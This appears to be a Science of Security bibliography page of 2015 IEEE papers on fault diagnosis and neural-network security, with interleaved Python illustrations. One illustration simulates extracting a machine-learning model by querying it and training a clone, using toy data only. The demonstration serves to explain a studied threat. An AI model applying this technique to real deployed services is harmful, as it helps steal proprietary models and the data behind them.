Keywords: Degradation; Engines; Fault detection; Kalman filters; Monitoring; Robustness; Turbines; Fault diagnosis; Gas turbine engines; Generalized likelihood ratio; Hybrid Kalman filter; Multiple model-based approach; Piecewise linear models interpolation (ID#: 16-9224)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7298424&isnumber=4389040

 

Xiaoqin, Liu; Zewei, Dong; Hongdong, Qu; Limei, Song, "Dynamic Multiple Fault Diagnosis Based on HMM and BPSO," in Instrumentation and Measurement, Computer, Communication and Control (IMCCC), 2015 Fifth International Conference on, pp. 186-191, 18-20 Sept. 2015. doi: 10.1109/IMCCC.2015.46

Abstract: For systems that demand short diagnosis delay, dynamic multiple fault diagnosis (DMFD) is put forward. In this paper, a DMFD method based on the Hidden Markov Model (HMM) is established for the system's inner state transitions and the corresponding external observation sequence, so that the inner state transitions can be recovered from the external observation sequence with the HMM decoding algorithm, which belongs to the class of NP-complete problems. This paper decomposes the original DMFD problem into several separable subproblems and solves each of them with the binary particle swarm optimization algorithm (BPSO). The application examples show that the system's real-time health status can be evaluated at a high correct ratio with this method.

Keywords: Computers; Fault diagnosis; Heuristic algorithms; Hidden Markov models; Linear programming; Markov processes; Particle swarm optimization; BPSO; Hidden Markov Model; dynamic multiple fault diagnosis (ID#: 16-9225)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7405825&isnumber=7405778
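
The HMM half of the method can be illustrated with exact Viterbi decoding, which recovers the most likely hidden fault-state sequence from an observation sequence (the paper instead decomposes the problem and solves the pieces with BPSO). The two-state model below is an assumption for the example.

```python
# Viterbi decoding of a toy healthy/faulty HMM from alarm observations.
import numpy as np

states = ["healthy", "faulty"]
trans = np.array([[0.95, 0.05],    # P(next state | current state)
                  [0.10, 0.90]])
emit = np.array([[0.8, 0.2],       # P(observation | state); obs 0 = nominal
                 [0.3, 0.7]])      # obs 1 = alarm
start = np.array([0.9, 0.1])
obs = [0, 0, 1, 1, 1, 0, 1]

n, T = len(states), len(obs)
logv = np.full((T, n), -np.inf)    # best log-probability ending in each state
back = np.zeros((T, n), dtype=int)
logv[0] = np.log(start) + np.log(emit[:, obs[0]])
for t in range(1, T):
    for j in range(n):
        scores = logv[t - 1] + np.log(trans[:, j])
        back[t, j] = int(np.argmax(scores))
        logv[t, j] = scores[back[t, j]] + np.log(emit[j, obs[t]])

path = [int(np.argmax(logv[-1]))]  # backtrack the best path
for t in range(T - 1, 0, -1):
    path.append(back[t, path[-1]])
path.reverse()
print([states[s] for s in path])
```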

 

Tanwir, S.; Prabhu, S.; Hsiao, M.; Lingappan, L., "Information-Theoretic and Statistical Methods of Failure Log Selection for Improved Diagnosis," in Test Conference (ITC), 2015 IEEE International, pp. 1-10, 6-8 Oct. 2015. doi: 10.1109/TEST.2015.7342381

Abstract: Diagnosis of each failed part requires the failed data captured on the test equipment. However, due to memory limitations on the tester, one often cannot store all the failed data for every chip tested. Consequently, truncated failure logs are used instead of complete logs for each part. Such truncation of the failure logs can result in very long turn-around times for diagnosis because important failure points may be removed from the log. Subsequently, the accuracy and resolution of final diagnosis may suffer even after multiple iterations of diagnosis. In addition, the existing test response compaction techniques though good for testing, either adversely affect diagnosis or are highly sensitive to deviation from the chosen fault model. In this context, the industry needs dynamic selection of better failure logs that enhances diagnosis. In this paper, we propose a number of metrics based on information theory that may help in selecting failure logs dynamically for improving the accuracy and resolution of final diagnosis. We also report on the efficacy of these metrics through the results of our experiments.

Keywords: failure analysis; fault diagnosis; information theory; iterative methods; microprocessor chips; statistical analysis; every tested chip; failed data; failure log selection; final diagnosis; improved diagnosis; information-theoretic methods; memory limitations; multiple diagnosis iterations; statistical methods; test equipment; test response compaction; truncated failure logs; Circuit faults; Compaction; Industries; Integrated circuit modeling; Measurement; Real-time systems; Testing (ID#: 16-9226)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7342381&isnumber=7342364
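
One family of metrics the abstract alludes to can be illustrated with Shannon entropy: a truncated log whose failures spread over more distinct outputs carries more information for diagnosis. The log format and the selection rule below are assumptions for illustration.

```python
# Score candidate truncated failure logs by the entropy of failing outputs.
import math
from collections import Counter

def entropy(symbols):
    """Shannon entropy (bits) of a symbol sequence."""
    counts, total = Counter(symbols), len(symbols)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# Each candidate log: list of (test_id, failing_output) pairs.
log_a = [(1, "o3"), (2, "o3"), (5, "o3"), (9, "o3")]   # one failing output only
log_b = [(1, "o3"), (4, "o7"), (5, "o2"), (9, "o3")]   # diverse failing outputs

for name, log in [("log_a", log_a), ("log_b", log_b)]:
    print(name, "entropy =", round(entropy([out for _, out in log]), 3))
# log_b scores 1.5 bits versus 0.0 for log_a, so it would be kept.
```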

 

Jie Zhang; Ming Lyu; Xianfeng Li; Jiping Zheng, "Fault Detection for Networked Control System with Multiple Communication Delays and Multiple Missing Measurements," in Networking, Sensing and Control (ICNSC), 2015 IEEE 12th International Conference on, pp. 580-585, 9-11 April 2015. doi: 10.1109/ICNSC.2015.7116102

Abstract: This paper is concerned with the fault detection problem for a class of Networked Control Systems (NCSs) with both multiple communication delays and multiple missing measurements. We build up a fault detection filter through a model of the NCS, so that the overall fault detection dynamics is exponentially stable in the mean square, while the error between the residual signal and the fault signal is made as small as possible. Sufficient conditions are first established for the existence of the desired fault detection filters, and then the corresponding solvability conditions for the desired filter gains are established. Finally, a simulation example is given to demonstrate the effectiveness of the proposed method.

Keywords: asymptotic stability; delays; fault diagnosis; networked control systems; NCS; exponential stability; fault detection; multiple communication delays; multiple missing measurements; networked control system; sufficient conditions; Delays; Electronic mail; Fault detection; Loss measurement; Networked control systems; Noise; Random variables (ID#: 16-9227)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116102&isnumber=7115994

 

Timotheou, S.; Panayiotou, C.; Polycarpou, M., "Fault-Adaptive Traffic Density Estimation for the Asymmetric Cell Transmission Model," in Intelligent Transportation Systems (ITSC), 2015 IEEE 18th International Conference on, pp. 2855-2860, 15-18 Sept. 2015. doi: 10.1109/ITSC.2015.459

Abstract: The often faulty nature of measurement sensors hinders reliable traffic state estimation, affecting in this way various transportation operations such as traffic control and in-car navigation. This work proposes a systematic, model-based, online and network-wide approach to achieve robust and good quality state estimation in the presence of sensor faults. The approach is comprised of three stages aiming at 1) identifying the level of faulty behavior of each sensor using a novel fault-tolerant optimization algorithm, 2) isolating faults, and 3) improving state estimation performance by adaptively compensating sensor faults and resolving the state estimation problem. The approach is examined in the context of the Asymmetric Cell Transmission Model for freeway traffic density estimation. Simulation results demonstrate the effectiveness of the proposed fault-adaptive approach, yielding estimation performance very close to the one obtained with healthy measurements, irrespective of the fault magnitude. It is further illustrated that the developed fault-tolerant optimization algorithm can simultaneously identify different types of faults from multiple sensors.

Keywords: estimation theory; fault diagnosis; fault tolerant control; optimisation; road traffic control; state estimation; asymmetric cell transmission model; fault magnitude; fault-adaptive approach; fault-adaptive traffic density estimation; fault-tolerant optimization algorithm; faulty behavior; freeway traffic density estimation; healthy measurement; in-car navigation; isolating fault; measurement sensor; quality state estimation; sensor fault; state estimation performance; state estimation problem; traffic control; traffic state estimation; transportation operation; Fault detection; Fault tolerance; Noise; Noise measurement; Sensors; State estimation (ID#: 16-9228)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7313551&isnumber=7312804

 

Kumar, T.N.; Almurib, H.A.F.; Lombardi, F., "Operational Fault Detection and Monitoring of a Memristor-Based LUT," in Design, Automation & Test in Europe Conference & Exhibition (DATE), 2015, pp. 429-434, 9-13 March 2015. doi: (not provided)

Abstract: This paper presents a method for operational testing of a memristor-based memory look-up table (LUT). In the proposed method, the deterioration of the memristors (as storage elements of a LUT) is modeled based on the reduction of the resistance range as observed in fabricated devices and recently reported in the technical literature. A quiescent current technique is used for testing the memristors when deterioration results in a change of state, thus leading to an erroneous (faulty) operation. An equivalent circuit model of the operational deterioration for a memristor-based LUT is presented. In addition to modeling and testing, the proposed method can be utilized also for continuous monitoring of the LUT in the presence of memristor deterioration in the LUT. The proposed method is assessed using LTSPICE; extensive simulation results are presented with respect to different operational features, such as LUT dimension and range of resistance. These results show that the proposed test method is scalable with LUT dimension and highly efficient for testing and monitoring a LUT in the presence of deteriorating multiple memristors.

Keywords: SPICE; equivalent circuits; fault diagnosis; memristors; table lookup; LTSPICE; change of state; device fabrication; equivalent circuit model; memristor operational deterioration; memristor-based LUT dimension; memristor-based memory lookup table; operational fault detection; operational fault monitoring; operational testing; quiescent current technique; resistance range reduction; technical literature; Circuit faults; Current measurement; Electrical resistance measurement; Memristors; Resistance; Table lookup; Testing; Memristor; deterioration; monitoring; quiescent current; testing (ID#: 16-9229)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092428&isnumber=7092347

 

Wyzga, A.; Gruca, J.; Polit, A.; Papafotiou, G., "The Load Current Sensing Method in the Multiple Output High Insulation Voltage Transformer," in Power Electronics and Applications (EPE'15 ECCE-Europe), 2015 17th European Conference on, pp. 1-8, 8-10 Sept. 2015. doi: 10.1109/EPE.2015.7309100

Abstract: Some power supplies do not require accurate current feedback to function properly. In many cases the information about the output current is only needed to make sure that the power supply is not overloaded. This paper describes a sensing method of individual secondary currents of a four channel power supply built using a single core transformer, by sensing the currents flowing in separate primary windings. Each secondary current could be sensed on the primary side of the high insulation voltage transformer with sufficient accuracy to assure proper fault handling strategy for the power supply.

Keywords: electric sensing devices; fault diagnosis; power supplies to apparatus; power transformer insulation; transformer cores; transformer windings; fault handling strategy; four channel power supply; load current sensing method; multiple output high insulation voltage transformer; primary winding; secondary current; single core transformer; Couplings; Insulation; Magnetic resonance; Power supplies; Power transformer insulation; Sensors; Windings; breakdown; circuits; converter control; current sensor; fault handling strategy; insulation; load sharing control; measurement; power supply (ID#: 16-9230)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7309100&isnumber=7309048

 

Indhumathi, C.; Vasantha Rani, S.P.J., "A Fuzzy Based Fault Type Detector for Remote Fault Diagnosis of Distribution Feeders," in Signal Processing, Communication and Networking (ICSCN), 2015 3rd International Conference on, pp. 1-5, 26-28 March 2015. doi: 10.1109/ICSCN.2015.7219832

Abstract: Increasing energy demands have led to the expansion of power infrastructure, which also means an increase in the number of lines subjected to faults due to short circuits or unintentional causes such as birds, falling branches, etc. Sometimes this causes a power outage. Identification of the right fault type is necessary for quick power restoration; hence accurate fault classification in the power distribution substation is essential. The work presented in this paper aims to automate the fault type identification process using a fuzzy based algorithm, thereby reducing the time required for power restoration. The experimental results indicate that the algorithm accurately detects the type of fault in single and multiple fault scenarios.

Keywords: fault diagnosis; fuzzy logic; power distribution faults; power distribution reliability; power engineering computing; power system restoration; short-circuit currents; substations; distribution feeder; fault identification; fault classification; fuzzy based fault type detector; multiple fault scenario; power distribution substation; power infrastructure expansion; power outage; power restoration; remote fault diagnosis; short-circuit current; Analytical models; Current measurement; Fault diagnosis; Substations; Training; Distribution substation Reliability; Faults in power system; Fuzzy Logic (ID#: 16-9231)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219832&isnumber=7219823
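
The flavor of a fuzzy fault-type detector can be conveyed with ramp-shaped membership functions over per-phase currents and a few rules mapping the "high" pattern to a fault type. The breakpoints and rules below are assumptions for illustration, not the paper's design.

```python
# Toy fuzzy classification of fault type from per-unit phase currents.
def mu_high(i_pu):
    """Membership of a per-unit current in the fuzzy set 'high'."""
    if i_pu <= 1.2:
        return 0.0
    if i_pu >= 3.0:
        return 1.0
    return (i_pu - 1.2) / (3.0 - 1.2)   # linear ramp between 1.2 and 3.0 pu

def classify(ia, ib, ic):
    high = [mu_high(i) for i in (ia, ib, ic)]
    n_high = sum(m > 0.5 for m in high)
    if n_high == 3:
        return "three-phase fault", min(high)
    if n_high == 2:
        return "phase-to-phase fault", min(m for m in high if m > 0.5)
    if n_high == 1:
        return "single line-to-ground fault", max(high)
    return "no fault", 1.0 - max(high)

print(classify(4.0, 1.0, 1.0))   # ('single line-to-ground fault', 1.0)
print(classify(3.5, 2.8, 1.0))   # ('phase-to-phase fault', ~0.89)
```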


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Neural Networks 2015

 

 
SoS Logo

Neural Networks 2015

 

Artificial neural networks have been used to solve a wide variety of tasks that are hard to solve using ordinary rule-based programming.  What has attracted much interest in neural networks is the possibility of learning.  Tasks such as function approximation, classification, pattern and sequence recognition, anomaly detection, filtering, clustering, blind source separation, compression, and control all have security implications.  For the Science of Security community, neural network research is related to metrics, resilience, and privacy.  The work cited here was presented in 2015.


Sagar, V.; Kumar, K., "A symmetric key cryptography using genetic algorithm and error back propagation neural network," in Computing for Sustainable Global Development (INDIACom), 2015 2nd International Conference on, pp. 1386-1391, 11-13 March 2015

Abstract: In conventional security mechanisms, cryptography is the process of hiding information and data from unauthorized access. It offers the unique possibility of certifiably secure data transmission among users at different remote locations. Cryptography is used to achieve availability, privacy and integrity over different networks. Usually, there are two categories of cryptography, i.e., symmetric and asymmetric. In this paper, we have proposed a new symmetric key algorithm based on a genetic algorithm (GA) and an error back propagation neural network (EBP-NN). The genetic algorithm has been used for encryption and the neural network has been used for the decryption process. Consequently, this paper proposes an easy cryptographically secure algorithm for communication over public computer networks.

Keywords: backpropagation; computer network security; cryptography; genetic algorithms; neural nets; EBP-NN; GA; certifiably secure data transmission; cryptographic secure algorithm; data hiding; data integrity; data privacy; decryption process; error back propagation neural network; genetic algorithm; information hiding; public computer networks; remote locations; symmetric key cryptography; unauthorized access; Artificial neural networks; Encryption; Genetic algorithms; Neurons; Receivers; cryptography; error back propagation neural network; genetic algorithm; symmetric key (ID#: 16-9253)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7100476&isnumber=7100186

 

Sujatha, K.; Nageswara Rao, P.V.; Rao, A.A.; Prasad, K.R.; Deepthi, M.S.B., "Biometric Identity Verification using Automatic Speaker Recognition," in Electrical, Electronics, Signals, Communication and Optimization (EESCO), 2015 International Conference on, pp. 1-5, 24-25 Jan. 2015. doi: 10.1109/EESCO.2015.7253813

Abstract: Password based security systems have to provide authentication and privacy. Designing a strongly privacy-protected, high-security authentication system remains an open problem because of weak passwords. The fundamental problem with normal text-based passwords is that weak passwords are vulnerable to attacks, while strong passwords create problems for users, who struggle to remember them. Biometric features like passwords uttered by speakers are well suited for authentication, as they cannot be stolen or recreated and are unique to each individual. Biometric identity verification using automatic speaker recognition is the neural network based process of automatically recognizing the user from a recording, using the text-dependent password uttered by the speaker. Here, biometric identity verification uses speech to either accept or reject the identity claimed by a given user. The text helps the user remember the password when forgotten, and even when revealed to others it does not harm the system, since only the voice password of the authorized user is accepted. Voice is considered a valuable biometric feature which depends on a specific person's speaking style and physical attributes, and speech data is very easy to collect and process. The proposed security framework will unlock only after recognizing a voice password spoken by the password holder, using an Artificial Neural Network.

Keywords: biometrics (access control); neural nets; speaker recognition; artificial neural network; automatic speaker recognition; biometric identity verification; password based security systems; Authentication; Biological system modeling; Mel frequency cepstral coefficient; Speaker recognition; Speech; Speech recognition; Artificial Neural Network (ANN); Automatic Speaker Recognition (ASR); Biometric Identity Verification (BIV) (ID#: 16-9254)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7253813&isnumber=7253613
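
The front end of such a system can be sketched as MFCC extraction plus a naive distance comparison against an enrolled template; a real system would, as the paper does, train a neural network on these features. This sketch assumes the librosa library is installed, and the signals and threshold are synthetic stand-ins for recorded utterances.

```python
# Crude voiceprint: mean MFCC vector, compared by Euclidean distance.
import numpy as np
import librosa

def mfcc_template(y, sr=16000, n_mfcc=13):
    """Mean MFCC vector over an utterance."""
    return librosa.feature.mfcc(y=y, sr=sr, n_mfcc=n_mfcc).mean(axis=1)

rng = np.random.default_rng(2)
sr = 16000
enroll = rng.normal(0, 0.1, sr)              # stand-in for an enrollment clip
attempt = enroll + rng.normal(0, 0.01, sr)   # same "speaker", slight variation
imposter = rng.normal(0, 0.3, sr)            # different "speaker"

template = mfcc_template(enroll, sr)
THRESHOLD = 20.0                             # toy acceptance threshold
for name, y in [("genuine", attempt), ("imposter", imposter)]:
    d = np.linalg.norm(mfcc_template(y, sr) - template)
    print(f"{name}: distance {d:.1f} ->", "accept" if d < THRESHOLD else "reject")
```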

 

Ashwin Kumar, T.K.; Hong Liu; Thomas, J.P.; Mylavarapu, G., "Identifying Sensitive Data Items within Hadoop," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1308-1313, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.293

Abstract: Recent growth in big-data is raising security and privacy concerns. Organizations that collect data from various sources are at risk of legal or business liabilities due to security breaches and exposure of sensitive information. Only file-level access control is feasible in the current Hadoop implementation, and sensitive information can only be identified manually or from information provided by the data owner. The problem of identifying sensitive information manually is complicated by the different types of data. When sensitive information is accessed by an unauthorized user or misused by an authorized person, privacy can be compromised. This paper is the first part of our intended access control framework for Hadoop; it automates the identification of sensitive data items, a process that is otherwise manual. To identify such data items, the proposed framework harnesses data context, usage patterns and data provenance. In addition, the proposed framework can also keep track of the data lineage.

Keywords: Big Data; authorisation; data handling; data privacy; parallel processing; Big-Data; Hadoop; access control framework; authorized person; business liabilities; data collection; data context; data lineage; data privacy; data provenance; data security; file-level access control; information misuse; legal liabilities; security breach; sensitive data item identification; sensitive information access; sensitive information exposure; sensitive information identification; unauthorized user; usage patterns; Access control; Context; Electromyography; Generators; Metadata; Neural networks; Sensitivity; Hadoop; data context; data lineage; data provenance; file-level access control; privacy; sensitive information; usage patterns (ID#: 16-9255)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336348&isnumber=7336120
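
The automation goal can be illustrated with a pattern-based scanner that flags records containing known sensitive data shapes before access-control labels are assigned. The patterns and records are assumptions; the paper's framework additionally uses data context, usage patterns, and provenance rather than regexes alone.

```python
# Flag records containing US SSN or 16-digit card-number patterns.
import re

SENSITIVE_PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card_number": re.compile(r"\b(?:\d{4}[- ]?){3}\d{4}\b"),
}

def scan_record(record):
    """Return the set of sensitive data types found in a text record."""
    return {name for name, pat in SENSITIVE_PATTERNS.items() if pat.search(record)}

records = [
    "order 1189 shipped to warehouse 7",
    "applicant SSN 123-45-6789, phone 555-0100",
    "card 4111-1111-1111-1111 charged $25",
]
for rec in records:
    found = scan_record(rec)
    print(("SENSITIVE " + ",".join(sorted(found))) if found else "clean", "|", rec)
```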

 

Randazzo, F.; Croce, D.; Tinnirello, I.; Barcellona, C.; Merani, M.L., "Experimental evaluation of privacy-preserving aggregation schemes on planetlab," in Wireless Communications and Mobile Computing Conference (IWCMC), 2015 International, pp. 379-384, 24-28 Aug. 2015. doi: 10.1109/IWCMC.2015.7289113

Abstract: New pervasive technologies often reveal much sensitive information about users' habits, seriously compromising the privacy and sometimes even the personal security of people. To cope with this problem, researchers have developed the idea of privacy-preserving data mining, which refers to the possibility of releasing aggregate information about the data provided by multiple users, without any information leakage about individual data. These techniques have different privacy levels and communication costs, but all of them can suffer when some users' data becomes inaccessible during the operation of the privacy preserving protocols. It is thus interesting to validate the applicability of such architectures in real-world scenarios. In this paper we experimentally evaluate two promising privacy-preserving techniques on PlanetLab, analyzing the execution time and the failure rate that each scheme exhibits.

Keywords: data mining; data privacy; ubiquitous computing; PlanetLab; communication costs; pervasive technologies; privacy preserving protocols; privacy-preserving aggregation schemes; privacy-preserving data mining; Artificial neural networks; Cryptography; Data privacy; Peer-to-peer computing; Protocols; Servers; data mining; privacy; secret sharing; secure multi-party computation (ID#: 16-9256)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7289113&isnumber=7288920
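
One building block behind such aggregation schemes is secret sharing. Below is a minimal Python sketch of additive secret sharing over a prime field: each user splits a private value into shares so that peers can jointly compute the sum while no single peer learns any individual input. This is a generic illustration, not the specific protocols evaluated on PlanetLab.

```python
import random

PRIME = 2**61 - 1  # field modulus; any prime larger than the aggregate works

def share(value: int, n_peers: int) -> list:
    """Split one user's value into n additive shares summing to it mod PRIME."""
    shares = [random.randrange(PRIME) for _ in range(n_peers - 1)]
    shares.append((value - sum(shares)) % PRIME)
    return shares

def aggregate(all_shares: list) -> int:
    """Peer j sums the j-th shares it received; summing peer totals gives only the aggregate."""
    peer_totals = [sum(col) % PRIME for col in zip(*all_shares)]
    return sum(peer_totals) % PRIME

if __name__ == "__main__":
    user_values = [12, 7, 30]                        # private inputs of three users
    shares = [share(v, n_peers=3) for v in user_values]
    print(aggregate(shares))                         # 49, the sum and nothing more
```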

 

Beiye Liu; Chunpeng Wu; Hai Li; Yiran Chen; Qing Wu; Barnell, M.; Qinru Qiu, "Cloning your mind: Security challenges in cognitive system designs and their solutions," in Design Automation Conference (DAC), 2015 52nd ACM/EDAC/IEEE, pp. 1-5, 8-12 June 2015. doi: 10.1145/2744769.2747915

Abstract: With the boom in big-data applications, cognitive information processing systems that leverage advanced data processing technologies, e.g., machine learning and data mining, are widely used in many industry fields. Although these technologies demonstrate great processing capability and accuracy in the relevant applications, several security and safety challenges are also emerging against these learning-based technologies. In this paper, we first introduce several security concerns in cognitive system designs. Some real examples are then used to demonstrate how attackers can potentially access confidential user data, replicate a sensitive data processing model without being granted access to the details of the model, and obtain key features of the training data by using services publicly accessible to a normal user. Based on the analysis of these security challenges, we also discuss several possible solutions that can protect the information privacy and security of cognitive systems during different stages of use.

keywords: Big Data;cognition;security of data;Big-Data application;cognitive information processing systems;cognitive system design;data mining;data security;machine learning;sensitive data processing model;Data models;Neural networks;Predictive models;Security;Training;Training data;Cognitive Systems;Machine Learning;Security (ID#: 16-9257)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167279&isnumber=7167177
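
The model-replication threat described above can be pictured as a toy "model extraction" experiment: an attacker who can only observe a deployed classifier's label outputs trains a substitute model on its answers. The scikit-learn sketch below uses a hypothetical two-feature victim model and invented data; it illustrates the idea only and is not one of the paper's case studies.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier

rng = np.random.default_rng(0)
X_private = rng.normal(size=(500, 2))                      # victim's confidential training data
y_private = (X_private[:, 0] + X_private[:, 1] > 0).astype(int)
victim = LogisticRegression().fit(X_private, y_private)    # exposed as a public service

# Attacker: query the service on self-chosen inputs and fit a substitute model.
queries = rng.uniform(-3, 3, size=(1000, 2))
answers = victim.predict(queries)                          # only labels are observed
clone = DecisionTreeClassifier(max_depth=5).fit(queries, answers)

test = rng.normal(size=(200, 2))
agreement = (clone.predict(test) == victim.predict(test)).mean()
print(round(float(agreement), 2))                          # high agreement: model replicated
```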

 

[Title page]," in Futuristic Trends on Computational Analysis and Knowledge Management (ABLAZE), 2015 International Conference on, pp. 1-1, 25-27 Feb. 2015. doi: 10.1109/ABLAZE.2015.7155050

Abstract: The following topics are dealt with: vibration signal based monitoring; mechanical microdrilling; rule based inflectional urdu stemmer usal; rule based derivational urdu stemmer usal; fuzzy logic controller; heat exchanger temperature process; text dependent speaker recognition; MFCC; SBC; multikeyword based sorted querying; encrypted cloud data; communication understandability enhancement; GSD; parsing; input power quality; switched reluctance motor drive; externally powered upper limb prostheses; program test data generation; launch vehicle optimal trajectory generation; misalignment fault detection; induction motors; current signature analysis; vibration signature analysis; wind power plants; vortex induced vibration; mechanical structure modal analysis; machining parameter optimization; diesel engines; high speed nonvolatile NEMS memory devices; image fusion; RGB color space; LUV color space; offline English character recognition; human skin detection; tumor boundary extraction; MR images; OdiaBraille; text transcription; shadow detection; YIQ color models; color aerial images; moving object segmentation; image data deduplication; iris recognition; two-stage series connected thermoelectric generator; education information system; cyclone separator CFD simulation; imperfect debugging; vulnerability discovery model; stochastic differential equation; cloud data access; attribute based encryption; agile SCRUM framework; PID controller optimisation; hybrid watermarking technique; privacy preservation; vertical partitioned medical database; power amplifier; software reliability growth modeling; cochlear implantation; cellular towers; feedforward neural networks; MBSOM; agent based semantic ontology matching; phonetic word identification; test case selection; MANET security issues; online movie data classification; modified LEACH protocol; mobile ad hoc networks; virtual machine introspection; task scheduling; cluster computing; image compression; green cloud computing; critical health data transmission system; irreversible regenerative Brayton cycle; task set based adaptive round robin scheduling; database security; heterogeneous online social networks; aspect oriented systems; IP network; MPLS network; DBSCAN algorithm; VANET; self-organizing feature map; image segmentation; enzyme classification; wireless sensor networks; energy smart routing protocol; adaptive gateway discovery mechanism; heuristic job scheduling; AODV based congestion control protocol; expert system; home appliances; relay node based heer protocol; data storage; TORA security; data aggregation; low energy adaptive stable energy efficient protocol; fuzzy logic based clustering algorithm; hybrid evolutionary MPLS tunneling algorithm; English mobile teaching; eigenvector centrality; genetic algorithms; data mining; heart disease prediction; lossless data compression; reconfigurable ring resonator; triple band stacked patch antenna; energy based spectrum sensing; cognitive radio networks; FPGA; knowledge representation; multiband microstrip antenna; Web indexing; HTML priority system; Web cache recommender system; e-learning; IT skill learning for visual impaired; user review data analysis; software up-gradation model; software testing; Web crawlers; secret key watermarking; WAV audio file; SRM drive; ZETA converter; fractional PID tuning; medical image reconstruction; speech recognition system; video authentication; digital forensics; content based image retrieval; image classification; hybrid wavelet transform; facial feature extraction; RBSD adder; smart home environment; generalized discrete time model; We Chat marketing; foreign language learning; carbon dioxide emission mitigation; power generation; smartphone storage enhancement; and virtualization.

keywords: Brayton cycle;IP networks;adders;aspect-oriented programming;audio watermarking;biomedical MRI;cardiology;character recognition;cloud computing;cochlear implants;cognitive radio;computational fluid dynamics;computer science education;content-based retrieval;cryptography;cyclone separators;data analysis;data compression;data mining;data privacy;diesel engines;differential equations;digital forensics;domestic appliances;drilling;educational administrative data processing;eigenvalues and eigenfunctions;enzymes;expert systems;face recognition;fault diagnosis;feature extraction;feedforward neural nets;field programmable gate arrays;fuzzy control;genetic algorithms;grammars;green computing;handicapped aids;heat exchangers;home computing;image classification;image coding;image colour analysis;image fusion;image reconstruction;image retrieval;image segmentation;image watermarking;indexing;induction motors;internetworking;iris recognition;knowledge representation;linguistics;medical image processing;microstrip antennas;mobile learning;modal analysis;nanoelectromechanical devices;object detection;ontologies (artificial intelligence);pattern clustering;power amplifiers;power supply quality;program debugging;program testing;radio spectrum management;recommender systems;reluctance motor drives;resonators;routing protocols;scheduling;self-organising feature maps;social networking (online);software reliability;speaker recognition;speech processing;storage management;telecommunication congestion control;thermoelectric conversion;three-term control;trajectory optimisation (aerospace);tumours;vehicular ad hoc networks;vibrations;video signal processing;virtual machines;virtualisation;wavelet transforms;wind power plants;wireless sensor networks;AODV based congestion control protocol;DBSCAN algorithm;English mobile teaching;FPGA;GSD;HTML priority system;IP network;IT skill learning for visual impaired;LUV color space;MANET security issues;MBSOM;MFCC;MPLS network;MR images;OdiaBraille;PID controller optimisation;RBSD adder;RGB color space;SBC;SRM drive;TORA security;VANET;WAV audio file;We Chat marketing;Web cache recommender system;Web crawlers;Web indexing;YIQ color models;ZETA converter;adaptive gateway discovery mechanism;agent based semantic ontology matching;agile SCRUM framework;aspect oriented systems;attribute based encryption;carbon dioxide emission mitigation;cellular towers;cloud data access;cluster computing;cochlear implantation;cognitive radio networks;color aerial images;communication understandability enhancement;content based image retrieval;critical health data transmission system;current signature analysis;cyclone separator CFD simulation;data aggregation;data mining;data storage;database security;diesel engines;digital forensics;e-learning;education information system;eigenvector centrality;encrypted cloud data;energy based spectrum sensing;energy smart routing protocol;enzyme classification;expert system;externally powered upper limb prostheses;facial feature extraction;feedforward neural networks;foreign language learning;fractional PID tuning;fuzzy logic based clustering algorithm;fuzzy logic controller;generalized discrete time model;genetic algorithms;green cloud computing;heart disease prediction;heat exchanger temperature process;heterogeneous online social networks;heuristic job scheduling;high speed nonvolatile NEMS memory devices;home appliances;human skin detection;hybrid evolutionary MPLS tunneling algorithm;hybrid watermarking technique;hybrid wavelet transform;image classification;image compression;image data deduplication;image fusion;image segmentation;imperfect debugging;induction motors;input power quality;iris recognition;irreversible regenerative Brayton cycle;knowledge representation;launch vehicle optimal trajectory generation;lossless data compression;low energy adaptive stable energy efficient protocol;machining parameter optimization;mechanical microdrilling;mechanical structure modal analysis;medical image reconstruction;misalignment fault detection;mobile ad hoc networks;modified LEACH protocol;moving object segmentation;multiband microstrip antenna;multikeyword based sorted querying;offline English character recognition;online movie data classification;parsing;phonetic word identification;power amplifier;power generation;privacy preservation;program test data generation;reconfigurable ring resonator;relay node based heer protocol;rule based derivational urdu stemmer usal;rule based inflectional urdu stemmer usal;secret key watermarking;self-organizing feature map;shadow detection;smart home environment;smartphone storage enhancement;software reliability growth modeling;software testing;software up-gradation model;speech recognition system;stochastic differential equation;switched reluctance motor drive;task scheduling;task set based adaptive round robin scheduling;test case selection;text dependent speaker recognition;text transcription;triple band stacked patch antenna;tumor boundary extraction;two-stage series connected thermoelectric generator;user review data analysis;vertical partitioned medical database;vibration signal based monitoring;vibration signature analysis;video authentication;virtual machine introspection;virtualization;vortex induced vibration;vulnerability discovery model;wind power plants;wireless sensor networks (ID#: 16-9258)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7155050&isnumber=7154914

 

